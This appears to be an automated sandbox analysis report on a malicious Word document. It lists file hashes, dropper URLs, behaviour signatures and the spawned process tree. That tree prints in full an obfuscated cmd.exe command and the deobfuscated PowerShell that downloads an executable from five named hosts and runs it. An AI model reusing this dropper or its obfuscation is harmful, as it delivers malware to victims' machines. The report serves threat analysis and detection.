Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-05-2024 02:46

General

  • Target

    443ae95c2c1e9323ba8ed84249fa07f1_JaffaCakes118.doc

  • Size

    230KB

  • MD5

    443ae95c2c1e9323ba8ed84249fa07f1

  • SHA1

    7f063c638a3b4819d4843619f73b3910d64be552

  • SHA256

    39d26726f643a3ca157d4d7e78f10831854f191120a06b95e0ed413fd0170d4f

  • SHA512

    73a2d7898ccb3fa31acfc0872c0753fbffcd4af7a0bc012431d47696bf36f32abf68d0c2212ddff8474cd195865cc8f9417a94190e2654fa0e1e9001c184d45a

  • SSDEEP

    3072:QvrNNpClULzo5DIzUmcQC8jL/xSu90OoiLuDKZXfwKeljR1v:6tZ7jcQCKxUOmD+XfwLj

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://sarahleighroddis.com/xZs22v11

exe.dropper

http://fbroz.com/COeg4ZZ

exe.dropper

http://thesunavenuequan2.com/UYUiGwf9j

exe.dropper

http://drapart.org/Jvn89HTd2O

exe.dropper

http://ikiw.iniqua.com/oO0OtJVo

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\443ae95c2c1e9323ba8ed84249fa07f1_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3652
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set eLO6=N1qVndw~20kzGl(eD.Y;b9p\/TvBW+=5ouI-8rtZ@OsE:FPM}$UL4yJ)ij h6xg'mfCcH%3{SA,a&&for %Z in (22,32,6,69,46,50,27,51,34,66,44,7,31,74,1,69,37,69,72,43,72,72,34,41,0,0,73,47,43,44,7,35,52,74,1,69,59,69,25,43,47,46,44,7,35,70,74,1,69,13,13,58,49,56,56,56,42,30,63,33,57,6,5,63,19,49,65,4,26,2,30,4,15,6,35,32,20,57,15,67,38,58,0,15,38,17,28,15,20,66,13,56,15,4,38,19,49,59,22,38,59,4,30,63,59,38,38,22,44,24,24,42,75,37,75,59,13,15,56,62,59,37,32,5,5,56,42,17,67,32,64,24,61,39,42,8,8,26,1,1,40,59,38,38,22,44,24,24,65,20,37,32,11,17,67,32,64,24,66,41,15,62,52,39,39,40,59,38,38,22,44,24,24,38,59,15,42,33,4,75,26,15,4,33,15,2,33,75,4,8,17,67,32,64,24,50,18,50,56,12,6,65,21,57,40,59,38,38,22,44,24,24,5,37,75,22,75,37,38,17,32,37,62,24,54,26,4,36,21,68,25,5,8,41,40,59,38,38,22,44,24,24,56,10,56,6,17,56,4,56,2,33,75,17,67,32,64,24,32,41,9,41,38,54,3,32,63,17,72,22,13,56,38,14,63,40,63,55,19,49,65,13,32,6,59,30,63,26,13,13,6,4,63,19,49,38,67,22,11,38,58,30,58,63,60,70,63,19,49,32,64,56,10,30,63,57,10,59,22,63,19,49,42,33,22,56,22,30,49,15,4,26,44,38,15,64,22,29,63,23,63,29,49,38,67,22,11,38,29,63,17,15,61,15,63,19,65,32,37,15,75,67,59,14,49,42,22,6,22,13,58,56,4,58,49,59,22,38,59,4,55,71,38,37,53,71,49,65,4,26,2,17,16,32,6,4,13,32,75,5,45,56,13,15,14,49,42,22,6,22,13,74,58,49,42,33,22,56,22,55,19,49,5,6,64,26,30,63,2,42,65,65,63,19,34,65,58,14,14,12,15,38,35,34,38,15,64,58,49,42,33,22,56,22,55,17,13,15,4,62,38,59,58,35,62,15,58,52,9,9,9,9,55,58,71,34,4,26,32,10,15,35,34,38,15,64,58,49,42,33,22,56,22,19,49,11,5,5,20,30,63,26,37,64,5,63,19,20,37,15,75,10,19,48,48,67,75,38,67,59,71,48,48,49,33,42,57,11,6,30,63,57,13,38,64,63,19,78)do set oqw=!oqw!!eLO6:~%Z,1!&&if %Z==78 echo !oqw:~5!|cmd.exe"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4136
      • C:\Windows\system32\cmd.exe
        CmD /V:ON/C"set eLO6=N1qVndw~20kzGl(eD.Y;b9p\/TvBW+=5ouI-8rtZ@OsE:FPM}$UL4yJ)ij h6xg'mfCcH%3{SA,a&&for %Z in (22,32,6,69,46,50,27,51,34,66,44,7,31,74,1,69,37,69,72,43,72,72,34,41,0,0,73,47,43,44,7,35,52,74,1,69,59,69,25,43,47,46,44,7,35,70,74,1,69,13,13,58,49,56,56,56,42,30,63,33,57,6,5,63,19,49,65,4,26,2,30,4,15,6,35,32,20,57,15,67,38,58,0,15,38,17,28,15,20,66,13,56,15,4,38,19,49,59,22,38,59,4,30,63,59,38,38,22,44,24,24,42,75,37,75,59,13,15,56,62,59,37,32,5,5,56,42,17,67,32,64,24,61,39,42,8,8,26,1,1,40,59,38,38,22,44,24,24,65,20,37,32,11,17,67,32,64,24,66,41,15,62,52,39,39,40,59,38,38,22,44,24,24,38,59,15,42,33,4,75,26,15,4,33,15,2,33,75,4,8,17,67,32,64,24,50,18,50,56,12,6,65,21,57,40,59,38,38,22,44,24,24,5,37,75,22,75,37,38,17,32,37,62,24,54,26,4,36,21,68,25,5,8,41,40,59,38,38,22,44,24,24,56,10,56,6,17,56,4,56,2,33,75,17,67,32,64,24,32,41,9,41,38,54,3,32,63,17,72,22,13,56,38,14,63,40,63,55,19,49,65,13,32,6,59,30,63,26,13,13,6,4,63,19,49,38,67,22,11,38,58,30,58,63,60,70,63,19,49,32,64,56,10,30,63,57,10,59,22,63,19,49,42,33,22,56,22,30,49,15,4,26,44,38,15,64,22,29,63,23,63,29,49,38,67,22,11,38,29,63,17,15,61,15,63,19,65,32,37,15,75,67,59,14,49,42,22,6,22,13,58,56,4,58,49,59,22,38,59,4,55,71,38,37,53,71,49,65,4,26,2,17,16,32,6,4,13,32,75,5,45,56,13,15,14,49,42,22,6,22,13,74,58,49,42,33,22,56,22,55,19,49,5,6,64,26,30,63,2,42,65,65,63,19,34,65,58,14,14,12,15,38,35,34,38,15,64,58,49,42,33,22,56,22,55,17,13,15,4,62,38,59,58,35,62,15,58,52,9,9,9,9,55,58,71,34,4,26,32,10,15,35,34,38,15,64,58,49,42,33,22,56,22,19,49,11,5,5,20,30,63,26,37,64,5,63,19,20,37,15,75,10,19,48,48,67,75,38,67,59,71,48,48,49,33,42,57,11,6,30,63,57,13,38,64,63,19,78)do set oqw=!oqw!!eLO6:~%Z,1!&&if %Z==78 echo !oqw:~5!|cmd.exe"
        3⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:4044
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $iiis='ujwd';$fnvq=new-object Net.WebClient;$hpthn='http://sarahleighroddis.com/xZs22v11@http://fbroz.com/COeg4ZZ@http://thesunavenuequan2.com/UYUiGwf9j@http://drapart.org/Jvn89HTd2O@http://ikiw.iniqua.com/oO0OtJVo'.Split('@');$flowh='vllwn';$tcpzt = '63';$omik='jkhp';$supip=$env:temp+'\'+$tcpzt+'.exe';foreach($spwpl in $hpthn){try{$fnvq.DownloadFile($spwpl, $supip);$dwmv='qsff';If ((Get-Item $supip).length -ge 40000) {Invoke-Item $supip;$zddb='vrmd';break;}}catch{}}$usjzw='jltm';"
          4⤵
            PID:4152
          • C:\Windows\system32\cmd.exe
            cmd.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4000
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $iiis='ujwd';$fnvq=new-object Net.WebClient;$hpthn='http://sarahleighroddis.com/xZs22v11@http://fbroz.com/COeg4ZZ@http://thesunavenuequan2.com/UYUiGwf9j@http://drapart.org/Jvn89HTd2O@http://ikiw.iniqua.com/oO0OtJVo'.Split('@');$flowh='vllwn';$tcpzt = '63';$omik='jkhp';$supip=$env:temp+'\'+$tcpzt+'.exe';foreach($spwpl in $hpthn){try{$fnvq.DownloadFile($spwpl, $supip);$dwmv='qsff';If ((Get-Item $supip).length -ge 40000) {Invoke-Item $supip;$zddb='vrmd';break;}}catch{}}$usjzw='jltm';
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:552

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\TCD780A.tmp\iso690.xsl

      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vi0mzh5u.vfe.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/552-54-0x000001B5565B0000-0x000001B5565D2000-memory.dmp

      Filesize

      136KB

    • memory/3652-19-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-12-0x00007FF8C1780000-0x00007FF8C1790000-memory.dmp

      Filesize

      64KB

    • memory/3652-5-0x00007FF903CCD000-0x00007FF903CCE000-memory.dmp

      Filesize

      4KB

    • memory/3652-18-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-8-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-9-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-11-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-38-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-10-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-7-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-14-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-13-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-15-0x00007FF8C1780000-0x00007FF8C1790000-memory.dmp

      Filesize

      64KB

    • memory/3652-39-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-17-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-0-0x00007FF8C3CB0000-0x00007FF8C3CC0000-memory.dmp

      Filesize

      64KB

    • memory/3652-6-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-1-0x00007FF8C3CB0000-0x00007FF8C3CC0000-memory.dmp

      Filesize

      64KB

    • memory/3652-16-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-44-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-43-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-4-0x00007FF8C3CB0000-0x00007FF8C3CC0000-memory.dmp

      Filesize

      64KB

    • memory/3652-3-0x00007FF8C3CB0000-0x00007FF8C3CC0000-memory.dmp

      Filesize

      64KB

    • memory/3652-2-0x00007FF8C3CB0000-0x00007FF8C3CC0000-memory.dmp

      Filesize

      64KB

    • memory/3652-530-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-540-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-541-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-542-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB

    • memory/3652-565-0x00007FF8C3CB0000-0x00007FF8C3CC0000-memory.dmp

      Filesize

      64KB

    • memory/3652-566-0x00007FF8C3CB0000-0x00007FF8C3CC0000-memory.dmp

      Filesize

      64KB

    • memory/3652-567-0x00007FF8C3CB0000-0x00007FF8C3CC0000-memory.dmp

      Filesize

      64KB

    • memory/3652-568-0x00007FF8C3CB0000-0x00007FF8C3CC0000-memory.dmp

      Filesize

      64KB

    • memory/3652-569-0x00007FF903C30000-0x00007FF903E25000-memory.dmp

      Filesize

      2.0MB